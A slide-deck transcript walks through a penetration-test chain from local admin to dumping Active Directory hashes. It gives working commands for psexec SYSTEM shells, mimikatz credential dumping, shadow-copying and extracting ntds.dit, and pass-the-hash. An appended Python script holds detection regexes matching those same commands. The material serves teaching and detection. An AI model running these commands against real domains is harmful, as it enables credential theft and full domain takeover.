Fall of a domain | From local admin to Domain user hashes
Author: Riyaz Walikar
Published in: Technology
Transcript

  • 1. The Fall of a Domain: Local Admin to Domain User Hashes. Riyaz Walikar
  • 2. Disclaimer
    - It was far more painstaking and complicated than this!
    - Demo setup to show the execution path
    - All the commands were actually used in the pentest
    - Please do not try this on your office/corporate environment without written permission
  • 3. Please exercise caution!
  • 4. The story so far
    - Remote RDP access to a machine on the client network via VPN
    - Local Administrator rights to simulate an employee
    - User is a limited domain user
    - Domain controller on the same network, reachable, with LDAP services running
  • 5. Visually. This.
  • 6. Local Admin eh?
    - Locally logged in as TARDIS\fwhite
    - Limited domain user but local admin
    - Other users connected? [Task Manager > Users]
    - Found another user connected to our system via RDP – sweet! (possibly domain admin)
    - Need SYSTEM privs! Any ideas?
  • 7. Think Sysinternals!
    - psexec -s -i cmd.exe
  • 8. Dump connected user credentials
    - mimikatz (Benjamin Delpy)
    - Extracts plaintext passwords from memory
    - WDigest, tspkg, Kerberos and many more
    - mimikatz
    - privilege::debug
    - token::elevate
    - sekurlsa::logonPasswords
  • 9. Windows (In)Security?
  • 10. Now what? http://gapingvoid.com/2008/06/13/now-what/
  • 11. Remote CMD anyone?
    - RDP directly!
    - Let's be discreet
    - psexec -s -u TARDIS\atomboy \\10.10.10.1 cmd.exe
    - Game already over!
    - Instead, RDP with the user's credentials and present the report
  • 12. Let's grab some hashes
    - Active Directory stores user information in %systemroot%\ntds\ntds.dit
    - Locked while the system is running
    - ntdsutil + snapshot = backup (> Windows 2008)
    - vssadmin create shadow /for=C: (> Windows 2003)
  • 13. Let's grab some hashes
    - Backup readable by NT AUTHORITY\SYSTEM and administrators
    - We need the ntds.dit and SYSTEM files
    - cd / dir / other built-in cmd commands do not work on unmounted volume shadow copies
    - copy works!
  • 14. Core files needed
  • 15. NTDS.dit structure parse?
    - NTDSXtract: a framework for offline forensic analysis of ntds.dit
    - Needs the libesedb module as well
    - libesedb and creddump are in ntds_dump_hashes.zip
    - wget to a Linux box (Kali is a good choice)
  • 16. get framework + compile + make + run
    - wget http://ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
    - wget http://ntdsxtract.com/downloads/ntds_dump_hash.zip
    - unzip both
  • 17. get framework + compile + make + run
    - cd ntds_dump_hash/libesedb
    - ./configure && make
    - cd libesedb/esedbtools
    - ./esedbexport -l /tmp/ntds.log <ntds.dit>
  • 18. Yay!
    - python ../../ntdsxtract/dsusers.py datatable link_table --passwordhashes <system_file> --passwordhistory <system_file>
    - Clean up the output with ntdstopwdump.py (https://raw.github.com/inquisb/miscellaneous/master/ntdstopwdump.py)
  • 19. Now what? http://gapingvoid.com/2008/06/13/now-what/
  • 20. Pass the hash / password cracking!
    - Use the Windows Credentials Editor (Amplia Security)
    - Password cracking >> Humla perhaps
  • 21. References
    - http://blog.gentilkiwi.com/mimikatz
    - http://www.ampliasecurity.com/research/wcefaq.html
    - http://bernardodamele.blogspot.in/2011/12/dump-windows-password-hashes_16.html
  • 22. Thank you. riyazwalikar@gmail.com http://www.riyazwalikar.com
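A defender-side counterpart to the steps in slides 7, 8, 12 and 13: the command lines the deck relies on (psexec -s, the mimikatz sekurlsa commands, vssadmin/ntdsutil snapshots, and a copy of ntds.dit) are exactly what process-creation telemetry can be matched against. This is an added example, not part of the original deck; the event layout (host, user, cmdline), the host and user names and the file paths are all constructed.

```python
"""Detection rules for the credential-access steps described in this deck.
Added example, not from the original slides: each rule is a regex over the
command line of a process-creation record (Windows Security event 4688 or
Sysmon event 1 style, reduced here to a dict). All sample events are
constructed; the host, user and path values are not real telemetry."""
import re

# (rule name, pattern applied to the lower-cased command line)
RULES = [
    ("psexec_system_shell", re.compile(r"psexec.*\s-s\b.*cmd\.exe")),
    ("mimikatz_logonpasswords",
     re.compile(r"privilege::debug|sekurlsa::logonpasswords")),
    ("ntdsutil_snapshot", re.compile(r"ntdsutil.*snapshot")),
    ("vssadmin_shadow_create", re.compile(r"vssadmin.*create\s+shadow")),
    ("ntds_dit_copy", re.compile(r"\b(copy|xcopy|robocopy)\b.*ntds\.dit")),
]

def classify(cmdline):
    """Return the names of every rule that matches one command line."""
    text = cmdline.lower()
    return [name for name, rx in RULES if rx.search(text)]

def scan(events):
    """Run each event through the rules; return (host, user, rules) per hit."""
    hits = []
    for ev in events:
        matched = classify(ev["cmdline"])
        if matched:
            hits.append((ev["host"], ev["user"], matched))
    return hits

# Constructed sample events (hypothetical hosts, users and paths).
SAMPLE_EVENTS = [
    {"host": "WS01", "user": r"TARDIS\fwhite",
     "cmdline": "psexec -s -i cmd.exe"},
    {"host": "WS01", "user": r"NT AUTHORITY\SYSTEM",
     "cmdline": 'mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords"'},
    {"host": "DC01", "user": r"TARDIS\atomboy",
     "cmdline": "vssadmin create shadow /for=C:"},
    {"host": "DC01", "user": r"TARDIS\atomboy",
     "cmdline": r"copy C:\snap\Windows\NTDS\ntds.dit C:\temp\ntds.dit"},
    {"host": "WS02", "user": r"TARDIS\jsmith",
     "cmdline": r"notepad.exe C:\Users\jsmith\notes.txt"},
]

if __name__ == "__main__":
    for host, user, rules in scan(SAMPLE_EVENTS):
        print(f"{host} {user}: {', '.join(rules)}")
```

Any one of these rules firing on a domain controller, or the vssadmin/ntdsutil rule firing from an interactive session rather than a scheduled backup job, is worth an immediate look; the benign notepad event shows the rules stay quiet on ordinary activity.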